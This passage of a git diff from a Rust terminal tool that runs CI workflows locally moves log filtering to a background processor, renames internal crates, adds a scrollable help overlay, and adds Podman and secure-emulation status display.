                        || cached_logs.is_empty()
                    {
                        cached_logs = Self::get_combined_logs(&req.app_logs);
                        cached_app_logs_count = req.app_logs_count;
                        cached_system_logs_count = req.system_logs_count;
                    }

                    let response = Self::process_logs(&cached_logs, req);

                    if response_tx.send(response).is_err() {
                        break; // Receiver disconnected
                    }

                    last_processed_time = Instant::now();
                }
            }
        }
    }

    /// Get combined app and system logs
    fn get_combined_logs(app_logs: &[String]) -> Vec<String> {
        let mut all_logs = Vec::new();

        // Add app logs
        for log in app_logs {
            all_logs.push(log.clone());
        }

        // Add system logs
        for log in wrkflw_logging::get_logs() {
            all_logs.push(log.clone());
        }

        all_logs
    }

    /// Process logs according to search and filter criteria
    fn process_logs(all_logs: &[String], request: &LogProcessingRequest) -> LogProcessingResponse {
        // Filter logs based on search query and filter level
        let mut filtered_logs = Vec::new();
        let mut search_matches = Vec::new();

        for (idx, log) in all_logs.iter().enumerate() {
            let passes_filter = match &request.filter_level {
                None => true,
                Some(level) => level.matches(log),
            };

            let matches_search = if request.search_query.is_empty() {
                true
            } else {
                log.to_lowercase()
                    .contains(&request.search_query.to_lowercase())
            };

            if passes_filter && matches_search {
                filtered_logs.push((idx, log));
                if matches_search && !request.search_query.is_empty() {
                    search_matches.push(filtered_logs.len() - 1);
                }
            }
        }

        // Process filtered logs into display format
        let processed_logs: Vec<ProcessedLogEntry> = filtered_logs
            .iter()
            .map(|(_, log_line)| Self::process_log_entry(log_line, &request.search_query))
            .collect();

        LogProcessingResponse {
            processed_logs,
            total_log_count: all_logs.len(),
            filtered_count: filtered_logs.len(),
            search_matches,
        }
    }

    /// Process a single log entry into display format
    fn process_log_entry(log_line: &str, search_query: &str) -> ProcessedLogEntry {
        // Extract timestamp from log format [HH:MM:SS]
        let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
            let end = log_line.find(']').unwrap_or(0);
            if end > 1 {
                log_line[1..end].to_string()
            } else {
                "??:??:??".to_string()
            }
        } else {
            "??:??:??".to_string()
        };

        // Determine log type and style
        let (log_type, log_style) =
            if log_line.contains("Error") || log_line.contains("error") || log_line.contains("❌")
            {
                ("ERROR", Style::default().fg(Color::Red))
            } else if log_line.contains("Warning")
                || log_line.contains("warning")
                || log_line.contains("⚠️")
            {
                ("WARN", Style::default().fg(Color::Yellow))
            } else if log_line.contains("Success")
                || log_line.contains("success")
                || log_line.contains("✅")
            {
                ("SUCCESS", Style::default().fg(Color::Green))
            } else if log_line.contains("Running")
                || log_line.contains("running")
                || log_line.contains("⟳")
            {
                ("INFO", Style::default().fg(Color::Cyan))
            } else if log_line.contains("Triggering") || log_line.contains("triggered") {
                ("TRIG", Style::default().fg(Color::Magenta))
            } else {
                ("INFO", Style::default().fg(Color::Gray))
            };

        // Extract content after timestamp
        let content = if log_line.starts_with('[') && log_line.contains(']') {
            let start = log_line.find(']').unwrap_or(0) + 1;
            log_line[start..].trim()
        } else {
            log_line
        };

        // Create content spans with search highlighting
        let content_spans = if !search_query.is_empty() {
            Self::highlight_search_matches(content, search_query)
        } else {
            vec![Span::raw(content.to_string())]
        };

        ProcessedLogEntry {
            timestamp,
            log_type: log_type.to_string(),
            log_style,
            content_spans,
        }
    }

    /// Highlight search matches in content
    fn highlight_search_matches(content: &str, search_query: &str) -> Vec<Span<'static>> {
        let mut spans = Vec::new();
        let lowercase_content = content.to_lowercase();
        let lowercase_query = search_query.to_lowercase();

        if lowercase_content.contains(&lowercase_query) {
            let mut last_idx = 0;
            while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
                let real_idx = last_idx + idx;

                // Add text before match
                if real_idx > last_idx {
                    spans.push(Span::raw(content[last_idx..real_idx].to_string()));
                }

                // Add matched text with highlight
                let match_end = real_idx + search_query.len();
                spans.push(Span::styled(
                    content[real_idx..match_end].to_string(),
                    Style::default().bg(Color::Yellow).fg(Color::Black),
                ));

                last_idx = match_end;
            }

            // Add remaining text after last match
            if last_idx < content.len() {
                spans.push(Span::raw(content[last_idx..].to_string()));
            }
        } else {
            spans.push(Span::raw(content.to_string()));
        }

        spans
    }
}

impl Default for LogProcessor {
    fn default() -> Self {
        Self::new()
    }
}
@@ -1,10 +1,10 @@
// UI Models for wrkflw
use chrono::Local;
use executor::{JobStatus, StepStatus};
use std::path::PathBuf;
use wrkflw_executor::{JobStatus, StepStatus};

/// Type alias for the complex execution result type
pub type ExecutionResultMsg = (usize, Result<(Vec<executor::JobResult>, ()), String>);
pub type ExecutionResultMsg = (usize, Result<(Vec<wrkflw_executor::JobResult>, ()), String>);

/// Represents an individual workflow file
pub struct Workflow {
@@ -50,6 +50,7 @@ pub struct StepExecution {
}

/// Log filter levels
#[derive(Debug, Clone, PartialEq)]
pub enum LogFilterLevel {
    Info,
    Warning,

@@ -1,7 +1,7 @@
// UI utilities
use crate::models::{Workflow, WorkflowStatus};
use std::path::{Path, PathBuf};
use utils::is_workflow_file;
use wrkflw_utils::is_workflow_file;

/// Find and load all workflow files in a directory
pub fn load_workflows(dir_path: &Path) -> Vec<Workflow> {

@@ -145,15 +145,17 @@ pub fn render_execution_tab(
        .iter()
        .map(|job| {
            let status_symbol = match job.status {
                executor::JobStatus::Success => "✅",
                executor::JobStatus::Failure => "❌",
                executor::JobStatus::Skipped => "⏭",
                wrkflw_executor::JobStatus::Success => "✅",
                wrkflw_executor::JobStatus::Failure => "❌",
                wrkflw_executor::JobStatus::Skipped => "⏭",
            };

            let status_style = match job.status {
                executor::JobStatus::Success => Style::default().fg(Color::Green),
                executor::JobStatus::Failure => Style::default().fg(Color::Red),
                executor::JobStatus::Skipped => Style::default().fg(Color::Gray),
                wrkflw_executor::JobStatus::Success => {
                    Style::default().fg(Color::Green)
                }
                wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
                wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Gray),
            };

            // Count completed and total steps
@@ -162,8 +164,8 @@ pub fn render_execution_tab(
        .steps
        .iter()
        .filter(|s| {
            s.status == executor::StepStatus::Success
                || s.status == executor::StepStatus::Failure
            s.status == wrkflw_executor::StepStatus::Success
                || s.status == wrkflw_executor::StepStatus::Failure
        })
        .count();
@@ -1,7 +1,7 @@
// Help overlay rendering
use ratatui::{
    backend::CrosstermBackend,
    layout::Rect,
    layout::{Constraint, Direction, Layout, Rect},
    style::{Color, Modifier, Style},
    text::{Line, Span},
    widgets::{Block, BorderType, Borders, Paragraph, Wrap},
@@ -9,11 +9,22 @@ use ratatui::{
};
use std::io;

// Render the help tab
pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect) {
    let help_text = vec![
// Render the help tab with scroll support
pub fn render_help_content(
    f: &mut Frame<CrosstermBackend<io::Stdout>>,
    area: Rect,
    scroll_offset: usize,
) {
    // Split the area into columns for better organization
    let chunks = Layout::default()
        .direction(Direction::Horizontal)
        .constraints([Constraint::Percentage(50), Constraint::Percentage(50)].as_ref())
        .split(area);

    // Left column content
    let left_help_text = vec![
        Line::from(Span::styled(
            "Keyboard Controls",
            "🗂 NAVIGATION",
            Style::default()
                .fg(Color::Cyan)
                .add_modifier(Modifier::BOLD),
@@ -21,35 +32,391 @@ pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect)
        Line::from(""),
        Line::from(vec![
            Span::styled(
                "Tab",
                "Tab / Shift+Tab",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Switch between tabs"),
        ]),
        // More help text would follow...
        Line::from(vec![
            Span::styled(
                "1-4 / w,x,l,h",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Jump to specific tab"),
        ]),
        Line::from(vec![
            Span::styled(
                "↑/↓ or k/j",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Navigate lists"),
        ]),
        Line::from(vec![
            Span::styled(
                "Enter",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Select/View details"),
        ]),
        Line::from(vec![
            Span::styled(
                "Esc",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Back/Exit help"),
        ]),
        Line::from(""),
        Line::from(Span::styled(
            "🚀 WORKFLOW MANAGEMENT",
            Style::default()
                .fg(Color::Green)
                .add_modifier(Modifier::BOLD),
        )),
        Line::from(""),
        Line::from(vec![
            Span::styled(
                "Space",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Toggle workflow selection"),
        ]),
        Line::from(vec![
            Span::styled(
                "r",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Run selected workflows"),
        ]),
        Line::from(vec![
            Span::styled(
                "a",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Select all workflows"),
        ]),
        Line::from(vec![
            Span::styled(
                "n",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Deselect all workflows"),
        ]),
        Line::from(vec![
            Span::styled(
                "Shift+R",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Reset workflow status"),
        ]),
        Line::from(vec![
            Span::styled(
                "t",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Trigger remote workflow"),
        ]),
        Line::from(""),
        Line::from(Span::styled(
            "🔧 EXECUTION MODES",
            Style::default()
                .fg(Color::Magenta)
                .add_modifier(Modifier::BOLD),
        )),
        Line::from(""),
        Line::from(vec![
            Span::styled(
                "e",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Toggle emulation mode"),
        ]),
        Line::from(vec![
            Span::styled(
                "v",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Toggle validation mode"),
        ]),
        Line::from(""),
        Line::from(vec![Span::styled(
            "Runtime Modes:",
            Style::default()
                .fg(Color::White)
                .add_modifier(Modifier::BOLD),
        )]),
        Line::from(vec![
            Span::raw(" • "),
            Span::styled("Docker", Style::default().fg(Color::Blue)),
            Span::raw(" - Container isolation (default)"),
        ]),
        Line::from(vec![
            Span::raw(" • "),
            Span::styled("Podman", Style::default().fg(Color::Blue)),
            Span::raw(" - Rootless containers"),
        ]),
        Line::from(vec![
            Span::raw(" • "),
            Span::styled("Emulation", Style::default().fg(Color::Red)),
            Span::raw(" - Process mode (UNSAFE)"),
        ]),
        Line::from(vec![
            Span::raw(" • "),
            Span::styled("Secure Emulation", Style::default().fg(Color::Yellow)),
            Span::raw(" - Sandboxed processes"),
        ]),
    ];

    let help_widget = Paragraph::new(help_text)
    // Right column content
    let right_help_text = vec![
        Line::from(Span::styled(
            "📄 LOGS & SEARCH",
            Style::default()
                .fg(Color::Blue)
                .add_modifier(Modifier::BOLD),
        )),
        Line::from(""),
        Line::from(vec![
            Span::styled(
                "s",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Toggle log search"),
        ]),
        Line::from(vec![
            Span::styled(
                "f",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Toggle log filter"),
        ]),
        Line::from(vec![
            Span::styled(
                "c",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Clear search & filter"),
        ]),
        Line::from(vec![
            Span::styled(
                "n",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Next search match"),
        ]),
        Line::from(vec![
            Span::styled(
                "↑/↓",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Scroll logs/Navigate"),
        ]),
        Line::from(""),
        Line::from(Span::styled(
            "ℹ️ TAB OVERVIEW",
            Style::default()
                .fg(Color::White)
                .add_modifier(Modifier::BOLD),
        )),
        Line::from(""),
        Line::from(vec![
            Span::styled(
                "1. Workflows",
                Style::default()
                    .fg(Color::Cyan)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Browse & select workflows"),
        ]),
        Line::from(vec![Span::raw(" • View workflow files")]),
        Line::from(vec![Span::raw(" • Select multiple for batch execution")]),
        Line::from(vec![Span::raw(" • Trigger remote workflows")]),
        Line::from(""),
        Line::from(vec![
            Span::styled(
                "2. Execution",
                Style::default()
                    .fg(Color::Green)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Monitor job progress"),
        ]),
        Line::from(vec![Span::raw(" • View job status and details")]),
        Line::from(vec![Span::raw(" • Enter job details with Enter")]),
        Line::from(vec![Span::raw(" • Navigate step execution")]),
        Line::from(""),
        Line::from(vec![
            Span::styled(
                "3. Logs",
                Style::default()
                    .fg(Color::Blue)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - View execution logs"),
        ]),
        Line::from(vec![Span::raw(" • Search and filter logs")]),
        Line::from(vec![Span::raw(" • Real-time log streaming")]),
        Line::from(vec![Span::raw(" • Navigate search results")]),
        Line::from(""),
        Line::from(vec![
            Span::styled(
                "4. Help",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - This comprehensive guide"),
        ]),
        Line::from(""),
        Line::from(Span::styled(
            "🎯 QUICK ACTIONS",
            Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
        )),
        Line::from(""),
        Line::from(vec![
            Span::styled(
                "?",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Toggle help overlay"),
        ]),
        Line::from(vec![
            Span::styled(
                "q",
                Style::default()
                    .fg(Color::Yellow)
                    .add_modifier(Modifier::BOLD),
            ),
            Span::raw(" - Quit application"),
        ]),
        Line::from(""),
        Line::from(Span::styled(
            "💡 TIPS",
            Style::default()
                .fg(Color::Yellow)
                .add_modifier(Modifier::BOLD),
        )),
        Line::from(""),
        Line::from(vec![
            Span::raw("• Use "),
            Span::styled("emulation mode", Style::default().fg(Color::Red)),
            Span::raw(" when containers"),
        ]),
        Line::from(vec![Span::raw(" are unavailable or for quick testing")]),
        Line::from(""),
        Line::from(vec![
            Span::raw("• "),
            Span::styled("Secure emulation", Style::default().fg(Color::Yellow)),
            Span::raw(" provides sandboxing"),
        ]),
        Line::from(vec![Span::raw(" for untrusted workflows")]),
        Line::from(""),
        Line::from(vec![
            Span::raw("• Use "),
            Span::styled("validation mode", Style::default().fg(Color::Green)),
            Span::raw(" to check"),
        ]),
        Line::from(vec![Span::raw(" workflows without execution")]),
        Line::from(""),
        Line::from(vec![
            Span::raw("• "),
            Span::styled("Preserve containers", Style::default().fg(Color::Blue)),
            Span::raw(" on failure"),
        ]),
        Line::from(vec![Span::raw(" for debugging (Docker/Podman only)")]),
    ];

    // Apply scroll offset to the content
    let left_help_text = if scroll_offset < left_help_text.len() {
        left_help_text.into_iter().skip(scroll_offset).collect()
    } else {
        vec![Line::from("")]
    };

    let right_help_text = if scroll_offset < right_help_text.len() {
        right_help_text.into_iter().skip(scroll_offset).collect()
    } else {
        vec![Line::from("")]
    };

    // Render left column
    let left_widget = Paragraph::new(left_help_text)
        .block(
            Block::default()
                .borders(Borders::ALL)
                .border_type(BorderType::Rounded)
                .title(Span::styled(" Help ", Style::default().fg(Color::Yellow))),
                .title(Span::styled(
                    " WRKFLW Help - Controls & Features ",
                    Style::default()
                        .fg(Color::Yellow)
                        .add_modifier(Modifier::BOLD),
                )),
        )
        .wrap(Wrap { trim: true });

    f.render_widget(help_widget, area);
    // Render right column
    let right_widget = Paragraph::new(right_help_text)
        .block(
            Block::default()
                .borders(Borders::ALL)
                .border_type(BorderType::Rounded)
                .title(Span::styled(
                    " Interface Guide & Tips ",
                    Style::default()
                        .fg(Color::Cyan)
                        .add_modifier(Modifier::BOLD),
                )),
        )
        .wrap(Wrap { trim: true });

    f.render_widget(left_widget, chunks[0]);
    f.render_widget(right_widget, chunks[1]);
}

// Render a help overlay
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>, scroll_offset: usize) {
    let size = f.size();

    // Create a slightly smaller centered modal
    let width = size.width.min(60);
    let height = size.height.min(20);
    // Create a larger centered modal to accommodate comprehensive help content
    let width = (size.width * 9 / 10).min(120); // Use 90% of width, max 120 chars
    let height = (size.height * 9 / 10).min(40); // Use 90% of height, max 40 lines
    let x = (size.width - width) / 2;
    let y = (size.height - height) / 2;

@@ -60,10 +427,32 @@ pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
        height,
    };

    // Create a clear background
    // Create a semi-transparent dark background for better visibility
    let clear = Block::default().style(Style::default().bg(Color::Black));
    f.render_widget(clear, size);

    // Render the help content
    render_help_tab(f, help_area);
    // Add a border around the entire overlay for better visual separation
    let overlay_block = Block::default()
        .borders(Borders::ALL)
        .border_type(BorderType::Double)
        .style(Style::default().bg(Color::Black).fg(Color::White))
        .title(Span::styled(
            " Press ? or Esc to close help ",
            Style::default()
                .fg(Color::Gray)
                .add_modifier(Modifier::ITALIC),
        ));

    f.render_widget(overlay_block, help_area);

    // Create inner area for content
    let inner_area = Rect {
        x: help_area.x + 1,
        y: help_area.y + 1,
        width: help_area.width.saturating_sub(2),
        height: help_area.height.saturating_sub(2),
    };

    // Render the help content with scroll support
    render_help_content(f, inner_area, scroll_offset);
}
@@ -46,15 +46,15 @@ pub fn render_job_detail_view(

    // Job title section
    let status_text = match job.status {
        executor::JobStatus::Success => "Success",
        executor::JobStatus::Failure => "Failed",
        executor::JobStatus::Skipped => "Skipped",
        wrkflw_executor::JobStatus::Success => "Success",
        wrkflw_executor::JobStatus::Failure => "Failed",
        wrkflw_executor::JobStatus::Skipped => "Skipped",
    };

    let status_style = match job.status {
        executor::JobStatus::Success => Style::default().fg(Color::Green),
        executor::JobStatus::Failure => Style::default().fg(Color::Red),
        executor::JobStatus::Skipped => Style::default().fg(Color::Yellow),
        wrkflw_executor::JobStatus::Success => Style::default().fg(Color::Green),
        wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
        wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Yellow),
    };

    let job_title = Paragraph::new(vec![
@@ -101,15 +101,19 @@ pub fn render_job_detail_view(

    let rows = job.steps.iter().map(|step| {
        let status_symbol = match step.status {
            executor::StepStatus::Success => "✅",
            executor::StepStatus::Failure => "❌",
            executor::StepStatus::Skipped => "⏭",
            wrkflw_executor::StepStatus::Success => "✅",
            wrkflw_executor::StepStatus::Failure => "❌",
            wrkflw_executor::StepStatus::Skipped => "⏭",
        };

        let status_style = match step.status {
            executor::StepStatus::Success => Style::default().fg(Color::Green),
            executor::StepStatus::Failure => Style::default().fg(Color::Red),
            executor::StepStatus::Skipped => Style::default().fg(Color::Gray),
            wrkflw_executor::StepStatus::Success => {
                Style::default().fg(Color::Green)
            }
            wrkflw_executor::StepStatus::Failure => Style::default().fg(Color::Red),
            wrkflw_executor::StepStatus::Skipped => {
                Style::default().fg(Color::Gray)
            }
        };

        Row::new(vec![
@@ -147,15 +151,21 @@ pub fn render_job_detail_view(

    // Show step output with proper styling
    let status_text = match step.status {
        executor::StepStatus::Success => "Success",
        executor::StepStatus::Failure => "Failed",
        executor::StepStatus::Skipped => "Skipped",
        wrkflw_executor::StepStatus::Success => "Success",
        wrkflw_executor::StepStatus::Failure => "Failed",
        wrkflw_executor::StepStatus::Skipped => "Skipped",
    };

    let status_style = match step.status {
        executor::StepStatus::Success => Style::default().fg(Color::Green),
        executor::StepStatus::Failure => Style::default().fg(Color::Red),
        executor::StepStatus::Skipped => Style::default().fg(Color::Yellow),
        wrkflw_executor::StepStatus::Success => {
            Style::default().fg(Color::Green)
        }
        wrkflw_executor::StepStatus::Failure => {
            Style::default().fg(Color::Red)
        }
        wrkflw_executor::StepStatus::Skipped => {
            Style::default().fg(Color::Yellow)
        }
    };

    let mut output_text = step.output.clone();
@@ -140,45 +140,8 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
        f.render_widget(search_block, chunks[1]);
    }

    // Combine application logs with system logs
    let mut all_logs = Vec::new();

    // Now all logs should have timestamps in the format [HH:MM:SS]

    // Process app logs
    for log in &app.logs {
        all_logs.push(log.clone());
    }

    // Process system logs
    for log in logging::get_logs() {
        all_logs.push(log.clone());
    }

    // Filter logs based on search query and filter level
    let filtered_logs = if !app.log_search_query.is_empty() || app.log_filter_level.is_some() {
        all_logs
            .iter()
            .filter(|log| {
                let passes_filter = match &app.log_filter_level {
                    None => true,
                    Some(level) => level.matches(log),
                };

                let matches_search = if app.log_search_query.is_empty() {
                    true
                } else {
                    log.to_lowercase()
                        .contains(&app.log_search_query.to_lowercase())
                };

                passes_filter && matches_search
            })
            .cloned()
            .collect::<Vec<String>>()
    } else {
        all_logs.clone() // Clone to avoid moving all_logs
    };
    // Use processed logs from background thread instead of processing on every frame
    let filtered_logs = &app.processed_logs;

    // Create a table for logs for better organization
    let header_cells = ["Time", "Type", "Message"]
@@ -189,109 +152,10 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
        .style(Style::default().add_modifier(Modifier::BOLD))
        .height(1);

    let rows = filtered_logs.iter().map(|log_line| {
        // Parse log line to extract timestamp, type and message

        // Extract timestamp from log format [HH:MM:SS]
        let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
            let end = log_line.find(']').unwrap_or(0);
            if end > 1 {
                log_line[1..end].to_string()
            } else {
                "??:??:??".to_string() // Show placeholder for malformed logs
            }
        } else {
            "??:??:??".to_string() // Show placeholder for malformed logs
        };

        let (log_type, log_style, _) =
            if log_line.contains("Error") || log_line.contains("error") || log_line.contains("❌")
            {
                ("ERROR", Style::default().fg(Color::Red), log_line.as_str())
            } else if log_line.contains("Warning")
                || log_line.contains("warning")
                || log_line.contains("⚠️")
            {
                (
                    "WARN",
                    Style::default().fg(Color::Yellow),
                    log_line.as_str(),
                )
            } else if log_line.contains("Success")
                || log_line.contains("success")
                || log_line.contains("✅")
            {
                (
                    "SUCCESS",
                    Style::default().fg(Color::Green),
                    log_line.as_str(),
                )
            } else if log_line.contains("Running")
                || log_line.contains("running")
                || log_line.contains("⟳")
            {
                ("INFO", Style::default().fg(Color::Cyan), log_line.as_str())
            } else if log_line.contains("Triggering") || log_line.contains("triggered") {
                (
                    "TRIG",
                    Style::default().fg(Color::Magenta),
                    log_line.as_str(),
                )
            } else {
                ("INFO", Style::default().fg(Color::Gray), log_line.as_str())
            };

        // Extract content after timestamp
        let content = if log_line.starts_with('[') && log_line.contains(']') {
            let start = log_line.find(']').unwrap_or(0) + 1;
            log_line[start..].trim()
        } else {
            log_line.as_str()
        };

        // Highlight search matches in content if search is active
        let mut content_spans = Vec::new();
        if !app.log_search_query.is_empty() {
            let lowercase_content = content.to_lowercase();
            let lowercase_query = app.log_search_query.to_lowercase();

            if lowercase_content.contains(&lowercase_query) {
                let mut last_idx = 0;
                while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
                    let real_idx = last_idx + idx;

                    // Add text before match
                    if real_idx > last_idx {
                        content_spans.push(Span::raw(content[last_idx..real_idx].to_string()));
                    }

                    // Add matched text with highlight
                    let match_end = real_idx + app.log_search_query.len();
                    content_spans.push(Span::styled(
                        content[real_idx..match_end].to_string(),
                        Style::default().bg(Color::Yellow).fg(Color::Black),
                    ));

                    last_idx = match_end;
                }

                // Add remaining text after last match
                if last_idx < content.len() {
                    content_spans.push(Span::raw(content[last_idx..].to_string()));
                }
            } else {
                content_spans.push(Span::raw(content));
            }
        } else {
            content_spans.push(Span::raw(content));
        }

        Row::new(vec![
            Cell::from(timestamp),
            Cell::from(log_type).style(log_style),
            Cell::from(Line::from(content_spans)),
        ])
    });
    // Convert processed logs to table rows - this is now very fast since logs are pre-processed
    let rows = filtered_logs
        .iter()
        .map(|processed_log| processed_log.to_row());

    let content_idx = if show_search_bar { 2 } else { 1 };
@@ -15,7 +15,7 @@ use std::io;
pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
    // Check if help should be shown as an overlay
    if app.show_help {
        help_overlay::render_help_overlay(f);
        help_overlay::render_help_overlay(f, app.help_scroll);
        return;
    }

@@ -48,7 +48,7 @@ pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
        }
    }
    2 => logs_tab::render_logs_tab(f, app, main_chunks[1]),
    3 => help_overlay::render_help_tab(f, main_chunks[1]),
    3 => help_overlay::render_help_content(f, main_chunks[1], app.help_scroll),
    _ => {}
}
@@ -1,6 +1,5 @@
// Status bar rendering
use crate::app::App;
use executor::RuntimeType;
use ratatui::{
    backend::CrosstermBackend,
    layout::{Alignment, Rect},
@@ -10,6 +9,7 @@ use ratatui::{
    Frame,
};
use std::io;
use wrkflw_executor::RuntimeType;

// Render the status bar
pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, area: Rect) {
@@ -40,38 +40,84 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
        Style::default()
            .bg(match app.runtime_type {
                RuntimeType::Docker => Color::Blue,
                RuntimeType::Emulation => Color::Magenta,
                RuntimeType::Podman => Color::Cyan,
                RuntimeType::SecureEmulation => Color::Green,
                RuntimeType::Emulation => Color::Red,
            })
            .fg(Color::White),
    ));

    // Add Docker status if relevant
    if app.runtime_type == RuntimeType::Docker {
        // Check Docker silently using safe FD redirection
        let is_docker_available =
            match utils::fd::with_stderr_to_null(executor::docker::is_available) {
    // Add container runtime status if relevant
    match app.runtime_type {
        RuntimeType::Docker => {
            // Check Docker silently using safe FD redirection
            let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
                wrkflw_executor::docker::is_available,
            ) {
                Ok(result) => result,
                Err(_) => {
                    logging::debug("Failed to redirect stderr when checking Docker availability.");
                    wrkflw_logging::debug(
                        "Failed to redirect stderr when checking Docker availability.",
                    );
                    false
                }
            };

            status_items.push(Span::raw(" "));
            status_items.push(Span::styled(
                if is_docker_available {
                    " Docker: Connected "
                } else {
                    " Docker: Not Available "
                },
                Style::default()
                    .bg(if is_docker_available {
                        Color::Green
            status_items.push(Span::raw(" "));
            status_items.push(Span::styled(
                if is_docker_available {
                    " Docker: Connected "
                } else {
                    Color::Red
                })
                .fg(Color::White),
            ));
                    " Docker: Not Available "
                },
                Style::default()
                    .bg(if is_docker_available {
                        Color::Green
                    } else {
                        Color::Red
                    })
                    .fg(Color::White),
            ));
        }
        RuntimeType::Podman => {
            // Check Podman silently using safe FD redirection
            let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
                wrkflw_executor::podman::is_available,
            ) {
                Ok(result) => result,
                Err(_) => {
                    wrkflw_logging::debug(
                        "Failed to redirect stderr when checking Podman availability.",
                    );
                    false
                }
            };

            status_items.push(Span::raw(" "));
            status_items.push(Span::styled(
                if is_podman_available {
                    " Podman: Connected "
                } else {
                    " Podman: Not Available "
                },
                Style::default()
                    .bg(if is_podman_available {
                        Color::Green
                    } else {
                        Color::Red
                    })
                    .fg(Color::White),
            ));
        }
        RuntimeType::SecureEmulation => {
            status_items.push(Span::styled(
                " 🔒SECURE ",
                Style::default().bg(Color::Green).fg(Color::White),
            ));
        }
        RuntimeType::Emulation => {
            // No need to check anything for emulation mode
        }
    }

    // Add validation/execution mode
@@ -122,7 +168,7 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
        }
        2 => {
            // For logs tab, show scrolling instructions
            let log_count = app.logs.len() + logging::get_logs().len();
            let log_count = app.logs.len() + wrkflw_logging::get_logs().len();
            if log_count > 0 {
                // Convert to a static string for consistent return type
                let scroll_text = format!(
@@ -135,7 +181,7 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
                "[No logs to display]"
            }
        }
        3 => "[?] Toggle help overlay",
        3 => "[↑/↓] Scroll help [?] Toggle help overlay",
        _ => "",
    };
    status_items.push(Span::styled(
@@ -1,15 +1,22 @@
[package]
name = "utils"
name = "wrkflw-utils"
version.workspace = true
edition.workspace = true
description = "utility functions for wrkflw"
description = "Utility functions for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true

[dependencies]
# Internal crates
models = { path = "../models" }
wrkflw-models.workspace = true

# External dependencies
serde.workspace = true
serde_yaml.workspace = true

[target.'cfg(unix)'.dependencies]
nix.workspace = true
21
crates/utils/README.md
Normal file
@@ -0,0 +1,21 @@
## wrkflw-utils

Shared helpers used across crates.

- Workflow file detection (`.github/workflows/*.yml`, `.gitlab-ci.yml`)
- File-descriptor redirection utilities for silencing noisy subprocess output (Unix only; Windows support is limited)

### Example

```rust
use std::path::Path;
use wrkflw_utils::{is_workflow_file, fd::with_stderr_to_null};

assert!(is_workflow_file(Path::new(".github/workflows/ci.yml")));

let value = with_stderr_to_null(|| {
    eprintln!("this is hidden on Unix, visible on Windows");
    42
}).unwrap();
assert_eq!(value, 42);
```
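
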